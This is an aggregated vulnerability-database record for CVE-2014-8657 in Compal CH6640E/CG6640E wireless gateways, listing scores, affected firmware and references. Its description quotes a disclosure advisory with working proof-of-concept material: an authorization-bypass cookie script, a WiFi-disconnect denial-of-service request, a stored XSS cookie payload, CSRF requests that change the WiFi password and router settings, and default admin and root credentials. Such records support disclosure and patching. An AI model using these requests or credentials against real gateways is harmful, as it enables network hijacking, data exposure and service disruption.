ID

VAR-201411-0180


CVE

CVE-2014-8657


TITLE

Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Service disruption in other firmware (DoS) Vulnerabilities

Trust: 0.8

sources: JVNDB: JVNDB-2014-005244

DESCRIPTION

The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to cause a denial of service (disconnect all wifi clients) via a request to wirelessChannelStatus.html. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities 2. A denial-of-service vulnerability 3. An HTML-injection vulnerability 4. Other attacks are also possible. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0 Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. Default credentials: admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information. Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php 04.10.2014 --- Authorization Bypass Information Disclosure Vulnerability ######################################################### http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml Set cookie: userData to root or admin, reveals additional pages/info. -- <html> <body> <script> document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Denial of Service (DoS) for all WiFi connected clients (disconnect) ################################################################### GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1 Stored Cross-Site Scripting (XSS) Vulnerability ############################################### Cookie: userData Value: hax0r"><script>alert(document.cookie);</script> -- <html> <body> <script> document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Cross-Site Request Forgery (CSRF) Vulnerability ############################################### DDNS config: ------------ GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1 Change wifi pass: ----------------- GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1 Add static mac address (static assigned dhcp client): ----------------------------------------------------- GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1 Enable/Disable UPnP: -------------------- GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)

Trust: 2.7

sources: NVD: CVE-2014-8657 // JVNDB: JVNDB-2014-005244 // CNVD: CNVD-2014-07893 // BID: 70762 // ZSL: ZSL-2014-5203 // VULHUB: VHN-76602 // PACKETSTORM: 128860

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2014-07893

AFFECTED PRODUCTS

vendor:compal broadbandmodel:cg6640e wireless gatewayscope:eqversion:1.0

Trust: 1.8

vendor:compal broadbandmodel: - scope:eqversion:ch6640-3.5.11.7-nosh

Trust: 1.6

vendor:compal broadbandmodel:ch664oe wireless gatewayscope:eqversion:1.0

Trust: 1.0

vendor:compal broadbandmodel:ch6640e wireless gatewayscope:eqversion:1.0

Trust: 0.8

vendor:compal broadbandmodel:networksscope:eqversion:ch6640-3.5.11.7-nosh

Trust: 0.8

vendor:compalmodel:broadband networks inc cg6640e wireless gatewayscope:eqversion:1.0

Trust: 0.6

vendor:compalmodel:broadband networks inc ch6640e wireless gatewayscope:eqversion:1.0

Trust: 0.6

vendor:compal broadband cbnmodel:chscope:eqversion:model: ch6640 and ch6640e

Trust: 0.1

vendor:compal broadband cbnmodel:chscope:eqversion:hardware version: 1.0

Trust: 0.1

vendor:compal broadband cbnmodel:chscope:eqversion:firmware version: ch6640-3.5.11.7-nosh

Trust: 0.1

vendor:compal broadband cbnmodel:chscope:eqversion:boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01

Trust: 0.1

vendor:compal broadband cbnmodel:chscope:eqversion:docsis mode: docsis 3.0

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // JVNDB: JVNDB-2014-005244 // CNNVD: CNNVD-201411-192 // NVD: CVE-2014-8657

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-8657
value: MEDIUM

Trust: 1.0

NVD: CVE-2014-8657
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2014-07893
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201411-192
value: MEDIUM

Trust: 0.6

ZSL: ZSL-2014-5203
value: (3/5)

Trust: 0.1

VULHUB: VHN-76602
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2014-8657
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2014-07893
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-76602
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // VULHUB: VHN-76602 // JVNDB: JVNDB-2014-005244 // CNNVD: CNNVD-201411-192 // NVD: CVE-2014-8657

PROBLEMTYPE DATA

problemtype:CWE-16

Trust: 1.9

sources: VULHUB: VHN-76602 // JVNDB: JVNDB-2014-005244 // NVD: CVE-2014-8657

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201411-192

TYPE

configuration error

Trust: 0.6

sources: CNNVD: CNNVD-201411-192

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-005244

EXPLOIT AVAILABILITY

sources: ZSL: ZSL-2014-5203 // VULHUB: VHN-76602

PATCH

title:Top Pageurl:http://www.icbn.com.tw/

Trust: 0.8

sources: JVNDB: JVNDB-2014-005244

EXTERNAL IDS

db:NVDid:CVE-2014-8657

Trust: 3.5

db:EXPLOIT-DBid:35075

Trust: 2.6

db:ZSLid:ZSL-2014-5203

Trust: 2.5

db:PACKETSTORMid:128860

Trust: 1.9

db:OSVDBid:113838

Trust: 1.8

db:BIDid:70762

Trust: 1.0

db:JVNDBid:JVNDB-2014-005244

Trust: 0.8

db:CNNVDid:CNNVD-201411-192

Trust: 0.7

db:CNVDid:CNVD-2014-07893

Trust: 0.6

db:XFid:98330

Trust: 0.6

db:XFid:98328

Trust: 0.1

db:XFid:98329

Trust: 0.1

db:OSVDBid:113843

Trust: 0.1

db:OSVDBid:113836

Trust: 0.1

db:OSVDBid:113842

Trust: 0.1

db:OSVDBid:113841

Trust: 0.1

db:OSVDBid:113840

Trust: 0.1

db:OSVDBid:113837

Trust: 0.1

db:OSVDBid:113839

Trust: 0.1

db:CXSECURITYid:WLB-2014100162

Trust: 0.1

db:VULHUBid:VHN-76602

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // VULHUB: VHN-76602 // BID: 70762 // JVNDB: JVNDB-2014-005244 // PACKETSTORM: 128860 // CNNVD: CNNVD-201411-192 // NVD: CVE-2014-8657

REFERENCES

url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php

Trust: 2.4

url:http://osvdb.org/show/osvdb/113838

Trust: 1.8

url:http://www.exploit-db.com/exploits/35075

Trust: 1.7

url:http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html

Trust: 1.7

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/98330

Trust: 1.1

url:http://www.exploit-db.com/exploits/35075/

Trust: 0.9

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8657

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/98330

Trust: 0.6

url:http://cxsecurity.com/issue/wlb-2014100162

Trust: 0.1

url:http://osvdb.org/show/osvdb/113836

Trust: 0.1

url:http://osvdb.org/show/osvdb/113837

Trust: 0.1

url:http://osvdb.org/show/osvdb/113839

Trust: 0.1

url:http://osvdb.org/show/osvdb/113840

Trust: 0.1

url:http://osvdb.org/show/osvdb/113841

Trust: 0.1

url:http://osvdb.org/show/osvdb/113842

Trust: 0.1

url:http://osvdb.org/show/osvdb/113843

Trust: 0.1

url:http://packetstormsecurity.com/files/128860

Trust: 0.1

url:http://www.securityfocus.com/bid/70762

Trust: 0.1

url:http://xforce.iss.net/xforce/xfdb/98328

Trust: 0.1

url:http://xforce.iss.net/xforce/xfdb/98329

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656

Trust: 0.1

url:http://192.168.0.1/basiclanusers.html

Trust: 0.1

url:http://192.168.0.1/xml/docsisconfigfile.xml

Trust: 0.1

url:http://192.168.0.1/xml/cmgwbasicsetup.xml

Trust: 0.1

url:http://192.168.0.1/setwirelesssecurity.html?ssid=0&smode=7&sbmode=1&encalgm=3&pskey=new_password&rekeyint=0

Trust: 0.1

url:http://192.168.0.1:5000/rootdesc.xml

Trust: 0.1

url:http://192.168.0.1/basicddns.html

Trust: 0.1

url:http://192.168.0.1/setadvancedoptions.html?action=apply&instance=undefined&upnp=1

Trust: 0.1

url:http://192.168.0.1/xml/cmgwwirelesssecurity.xml

Trust: 0.1

url:http://192.168.0.1/wirelesschannelstatus.html

Trust: 0.1

url:http://192.168.0.1/setbasicdhcp1.html?action=add_static&macaddress=38%3a59%3af9%3ac3%3ae3%3aef&leasedip=8

Trust: 0.1

url:http://www.icbn.com.tw

Trust: 0.1

url:http://192.168.0.1/basicddns.html?ddnsservice=1&ddnsusername=a&ddnspassword=b&ddnshostname=c#

Trust: 0.1

url:http://192.168.0.1/setadvancedoptions.html?action=apply&instance=undefined&upnp=2

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // VULHUB: VHN-76602 // JVNDB: JVNDB-2014-005244 // PACKETSTORM: 128860 // CNNVD: CNNVD-201411-192 // NVD: CVE-2014-8657

CREDITS

LiquidWorm

Trust: 0.4

sources: BID: 70762 // PACKETSTORM: 128860

SOURCES

db:ZSLid:ZSL-2014-5203
db:CNVDid:CNVD-2014-07893
db:VULHUBid:VHN-76602
db:BIDid:70762
db:JVNDBid:JVNDB-2014-005244
db:PACKETSTORMid:128860
db:CNNVDid:CNNVD-201411-192
db:NVDid:CVE-2014-8657

LAST UPDATE DATE

2025-04-13T23:14:41.379000+00:00


SOURCES UPDATE DATE

db:ZSLid:ZSL-2014-5203date:2014-11-07T00:00:00
db:CNVDid:CNVD-2014-07893date:2014-11-10T00:00:00
db:VULHUBid:VHN-76602date:2017-09-08T00:00:00
db:BIDid:70762date:2014-12-03T00:56:00
db:JVNDBid:JVNDB-2014-005244date:2014-11-07T00:00:00
db:CNNVDid:CNNVD-201411-192date:2014-11-14T00:00:00
db:NVDid:CVE-2014-8657date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:ZSLid:ZSL-2014-5203date:2014-10-25T00:00:00
db:CNVDid:CNVD-2014-07893date:2014-11-04T00:00:00
db:VULHUBid:VHN-76602date:2014-11-06T00:00:00
db:BIDid:70762date:2014-10-28T00:00:00
db:JVNDBid:JVNDB-2014-005244date:2014-11-07T00:00:00
db:PACKETSTORMid:128860date:2014-10-28T00:59:24
db:CNNVDid:CNNVD-201411-192date:2014-11-14T00:00:00
db:NVDid:CVE-2014-8657date:2014-11-06T15:55:10.960